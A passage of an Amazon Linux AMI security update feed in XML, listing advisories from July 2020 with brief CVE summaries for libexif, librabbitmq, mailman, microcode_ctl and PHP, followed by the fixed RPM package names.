</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3190" title="" id="CVE-2016-3190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cairo-gobject" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-gobject-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-debuginfo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-debuginfo-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-devel-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-tools" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-tools-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-gobject-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-gobject-devel-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-gobject" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-gobject-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-gobject-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-gobject-devel-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-tools" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-tools-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-devel-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-debuginfo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-debuginfo-1.12.14-6.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1393</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1393: medium priority package update for libexif</title><issued date="2020-07-14 01:51:00" /><updated date="2020-07-15 17:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13112:
An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093.
1840344: CVE-2020-13112 libexif: several buffer over-reads in EXIF MakerNote handling can lead to information disclosure and DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13112" title="" id="CVE-2020-13112" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libexif-devel" version="0.6.21" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-devel-0.6.21-6.7.amzn1.x86_64.rpm</filename></package><package name="libexif" version="0.6.21" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-0.6.21-6.7.amzn1.x86_64.rpm</filename></package><package name="libexif-debuginfo" version="0.6.21" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-debuginfo-0.6.21-6.7.amzn1.x86_64.rpm</filename></package><package name="libexif-debuginfo" version="0.6.21" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-debuginfo-0.6.21-6.7.amzn1.i686.rpm</filename></package><package name="libexif-devel" version="0.6.21" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-devel-0.6.21-6.7.amzn1.i686.rpm</filename></package><package name="libexif" version="0.6.21" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-0.6.21-6.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1394</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1394: medium priority package update for librabbitmq</title><issued date="2020-07-14 01:53:00" /><updated date="2020-07-15 17:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18609:
An issue was discovered in amqp_handle_input in amqp_connection.c in rabbitmq-c 0.9.0. There is an integer overflow that leads to heap memory corruption in the handling of CONNECTION_STATE_HEADER. A rogue server could return a malicious frame header that leads to a smaller target_size value than needed. This condition is then carried on to a memcpy function that copies too much data into a heap buffer.
1786646: CVE-2019-18609 librabbitmq: integer overflow in amqp_handle_input in amqp_connection.c leads to heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18609" title="" id="CVE-2019-18609" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="librabbitmq-devel" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/librabbitmq-devel-0.1-0.2.hgfb6fca832fd2.3.amzn1.x86_64.rpm</filename></package><package name="librabbitmq-debuginfo" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/librabbitmq-debuginfo-0.1-0.2.hgfb6fca832fd2.3.amzn1.x86_64.rpm</filename></package><package name="librabbitmq" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/librabbitmq-0.1-0.2.hgfb6fca832fd2.3.amzn1.x86_64.rpm</filename></package><package name="librabbitmq-devel" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="i686"><filename>Packages/librabbitmq-devel-0.1-0.2.hgfb6fca832fd2.3.amzn1.i686.rpm</filename></package><package name="librabbitmq-debuginfo" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="i686"><filename>Packages/librabbitmq-debuginfo-0.1-0.2.hgfb6fca832fd2.3.amzn1.i686.rpm</filename></package><package name="librabbitmq" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="i686"><filename>Packages/librabbitmq-0.1-0.2.hgfb6fca832fd2.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1395</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1395: medium priority package update for mailman</title><issued date="2020-07-14 01:54:00" /><updated date="2020-07-15 17:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13796:
An issue was discovered in GNU Mailman before 2.1.28. A crafted URL can cause arbitrary text to be displayed on a web page from a trusted site.
1609090: CVE-2018-13796 mailman: Mishandled URLs in Utils.py:GetPathPieces() allows attackers to display arbitrary text on trusted sites
CVE-2018-0618:
Cross-site scripting vulnerability in Mailman 2.1.26 and earlier allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors.
1596458: CVE-2018-0618 mailman: Cross-site scripting vulnerability allows malicious listowners to inject scripts into listinfo pages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0618" title="" id="CVE-2018-0618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13796" title="" id="CVE-2018-13796" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailman-debuginfo" version="2.1.15" release="30.25.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-debuginfo-2.1.15-30.25.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="30.25.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-2.1.15-30.25.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="30.25.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-2.1.15-30.25.amzn1.i686.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="30.25.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-debuginfo-2.1.15-30.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1396</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1396: medium priority package update for microcode_ctl</title><issued date="2020-07-14 01:55:00" /><updated date="2020-07-15 17:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-0549:
Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
1788788: CVE-2020-0549 hw: L1D Cache Eviction Sampling
CVE-2020-0548:
Cleanup errors in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
1788786: CVE-2020-0548 hw: Vector Register Data Sampling
CVE-2020-0543:
Incomplete cleanup from specific special register read operations in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
A new domain bypass transient execution attack known as Special Register Buffer Data Sampling (SRBDS) has been found. This flaw allows data values from special internal registers to be leaked by an attacker able to execute code on any core of the CPU. An unprivileged, local attacker can use this flaw to infer values returned by affected instructions known to be commonly used during cryptographic operations that rely on uniqueness, secrecy, or both.
1827165: CVE-2020-0543 hw: Special Register Buffer Data Sampling (SRBDS)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0543" title="" id="CVE-2020-0543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0548" title="" id="CVE-2020-0548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0549" title="" id="CVE-2020-0549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.39.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.39.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.39.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.39.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.39.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.39.amzn1.i686.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.39.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1397</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1397: medium priority package update for php72 php73</title><issued date="2020-07-14 02:06:00" /><updated date="2020-07-15 17:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11048:
In PHP versions 7.2.x below 7.2.31, 7.3.x below 7.3.18 and 7.4.x below 7.4.6, when HTTP file uploads are allowed, supplying overly long filenames or field names could lead PHP engine to try to allocate oversized memory storage, hit the memory limit and stop processing the request, without cleaning up temporary files created by upload request. This potentially could lead to accumulation of uncleaned temporary files exhausting the disk space on the target server.
1837842: CVE-2019-11048 php: 2 integer wraparound when receiving multipart forms
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11048" title="" id="CVE-2019-11048" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-ldap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.19-1.26.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.19" 